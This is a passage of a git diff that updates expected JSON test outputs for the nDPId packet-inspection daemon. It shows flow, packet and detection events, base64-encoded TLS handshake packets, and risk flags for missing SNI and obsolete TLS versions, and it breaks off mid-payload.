-01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtwjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} +01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":3,"total-skipped-flows":0,"total-l4-data-len":2148,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1590680391590} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3/3 diff --git a/test/results/tls-rdn-extract.pcap.out b/test/results/tls-rdn-extract.pcap.out index 65193d1d1..09e959b1d 100644 --- a/test/results/tls-rdn-extract.pcap.out +++ b/test/results/tls-rdn-extract.pcap.out @@ -1,13 +1,13 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00631{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAACnLudAAIAGnZoKAAAB1ceV+3ppAbtkZ4Ye79i2a1AYQCmgXgAAFgMBAHoBAAB2AwEAAAAAM7RDB2u\/HXE+9PsbFMYgy+4A2s6CH4THeQytZwAAGAAvADUABQAKwBPAFMAJwAoAMgA4ABMABAEAADX\/AQABAAAAABMAEQAADmFkczEubXNhZHMubmV0AAUABQEAAAAAAAoABgAEABcAGAALAAIBAA=="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PJAADUGLVrVx5X7CgAAAQG7emnv2LZrZGeGnVAQGJhAQwAAFgMBAEoCAABGAwEAAAAAWuuHTEcV+akd0cdt\/mCIl2W0D3ZsYen8qlKhhyDexkYNJNvmICdLfXfmBpGxedPIi6ruP\/C4V2lgLy7HPwAvABYDARoFCwAaAQAZ\/gAOyDCCDsQwgg2soAMCAQICCmkXyLYACAACTA8wDQYJKoZIhvcNAQEFBQAwgYsxEzARBgoJkiaJk\/IsZAEZFgNjb20xGTAXBgoJkiaJk\/IsZAEZFgltaWNyb3NvZnQxFDASBgoJkiaJk\/IsZAEZFgRjb3JwMRcwFQYKCZImiZPyLGQBGRYHcmVkbW9uZDEqMCgGA1UEAxMhTWljcm9zb2Z0IFNlY3VyZSBTZXJ2ZXIgQXV0aG9yaXR5MB4XDTExMTAyMTE2NDIwM1oXDTEzMTAyMDE2NDIwM1owggVRMQswCQYDVQQGEwJVUzEQMA4GA1UEBxMHUmVkbW9uZDESMBAGA1UEChMJTWljcm9zb2Z0MQwwCgYDVQQLEwNHRlMxHjAcBgNVBAMMFSoub2ZmaWNlYXBwcy5saXZlLmNvbTEUMBIGA1UEAwwLKi5tc2Fkcy5uZXQxGTAXBgNVBAMMECouYWRzMi5tc2Fkcy5uZXQxGDAWBgNVBAMMDyouc3RjLnMtbXNuLmNvbTEtMCsGA1UEAwwkY2RuLmRjMmZpbGVzLioubGl2ZWZpbGVzdG9yZS1pbnQuY29tMSAwHgYDVQQDDBdjZG4uKi5saXZlZmlsZXN0b3JlLmNvbTEoMCYGA1UEAwwfKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLmNvbTEsMCoGA1UEAwwjKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLWludC5jb20xLTArBgNVBAMMJCoubWFya2V0cGxhY2Uud2luZG93c21vYmlsZS1wZXJmLmNvbTEYMBYGA1UEAwwPKi5zdGoucy1tc24uY29tMRswGQYDVQQDExJhamF4Lm1pY3Jvc29mdC5jb20xJDAiBgNVBAMMGyoubWljcm9zb2Z0LXNicy1kb21haW5zLmNvbTETMBEGA1UEAwwKKi5saXZlLm5ldDESMBAGA1UEAwwJKi5tc24uY29tMRYwFAYDVQQDDA0qLm1zbi1pbnQuY29tMSMwIQYDVQQDDBoqLmYxZHMuc2hhcmVkLmxpdmUtaW50LmNvbTEdMBsGA1UEAwwUKi5mMWRzLndseHJzLWludC5jb20xHjAcBgNVBAMMFSouc2hhcmVkLmxpdmUtaW50LmNvbTEaMBgGA1UEAwwRKi5zaGFyZWQubGl2ZS5jb20xGDAWBgNVBAMMDyoubWljcm9zb2Z0LmNvbTETMBEGA1UEAwwKKi5saXZlLmNvbTEXMBUGA1UEAwwOKi5saXZlLWludC5jb20xFDASBgNVBAMMCyoud2x4cnMuY29tMRgwFgYDVQQDDA8qLndseHJzLWludC5jb20xFzAVBgNVBAMMDiouc3Qucy1tc24uY29tMRgwFgYDVQQDDA8qLnN0Yi5zLW1zbi5jb20xKTAnBgNVBAMTIGltYWdlcy5tb3h5LndpbmRvd3NwaG9uZS1pbnQuY29tMRkwFwYDVQQDDBAqLndseHJzdS1pbnQuY29tMSwwKgYDVQQDEyNpbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUtaW50LmNvbTEoMCYGA1UEAxMfaW1hZ2VzLnBhcnRuZXIud2luZG93c3Bob25lLmNvbTEVMBMGA1UEAwwMKi5qcC5tc24uY29tMRswGQYDVQQDDBIqLmMzc2NzLmpwLm1zbi5jb20xGDAWBgNVBAMMDyouYXNwbmV0Y2RuLmNvbTEWMBQGA1UEAwwNKi5ob3RtYWlsLmNvbTEqMCgGA1UEAwwhKi5wYXJ0bmVyLWRmLndpbmRvd3NwaG9uZS1pbnQuY28="} -01101{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PNAADUGLVnVx5X7CgAAAQG7emnv2LwfZGeGnVAQGJjDXgAAbTEUMBIGA1UEAwwLKi5zLW1zbi5jb20xFzAVBgNVBAMMDioubGl2ZS1pbnQubmV0MR8wHQYDVQQDDBYqLndpbmRvd3NwaG9uZS1pbnQuY29tMRswGQYDVQQDDBIqLndpbmRvd3NwaG9uZS5jb20xKjAoBgNVBAMMISoucGFydG5lci1wYy53aW5kb3dzcGhvbmUtaW50LmNvbTEfMB0GA1UEAwwWKi5tYW5hZ2UubWljcm9zb2Z0LmNvbTEYMBYGA1UEAwwPKi52by5tc2VjbmQubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuX3PkoiInBfw68+6JNH406C4alrEnikcq1FZEZJZj8A0h7uDLWO01R+9CYljtZsYv4E+pfWvi8Z31QoN\/mqJYHgutax6\/UWMDIxFsXaIn1iXAoBA481Pyqa8XbzdmibAvotkEOm0ksJYJlu7VrGuQP+fyz69HW2nTnewmEyTsEy9pTZjqsxFdtBcWm2sS5KQA3Hoj6NzWl54VkXacUcpgQraZZFiSKVJpxhZpAqND3x7NCgSdQvwN2uTFwRCsRagxmCSSaZkQSbYCDh7lvCo6r5wBODibkMqCxrJ4nyg5Uw+J74SsSHhtBMkb6YMlWe5gPOyYSZfIVCby4onZWx45wIDAQABo4IGXzCCBlswDAYDVR0TAQH\/BAIwADALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMIIDowYDVR0RBIIDmjCCA5aCDyoudm8ubXNlY25kLm5ldIIVKi5vZmZpY2VhcHBzLmxpdmUuY29tggsqLm1zYWRzLm5ldIIQKi5hZHMyLm1zYWRzLm5ldIIPKi5zdGMucy1tc24uY29tgiRjZG4uZGMyZmlsZXMuKi5saXZlZmlsZXN0b3JlLWludC5jb22CF2Nkbi4qLmxpdmVmaWxlc3RvcmUuY29tgh8qLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUuY29tgiMqLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUtaW50LmNvbYIkKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLXBlcmYuY29tgg8qLnN0ai5zLW1zbi5jb22CEmFqYXgubWljcm9zb2Z0LmNvbYIbKi5taWNyb3NvZnQtc2JzLWRvbWF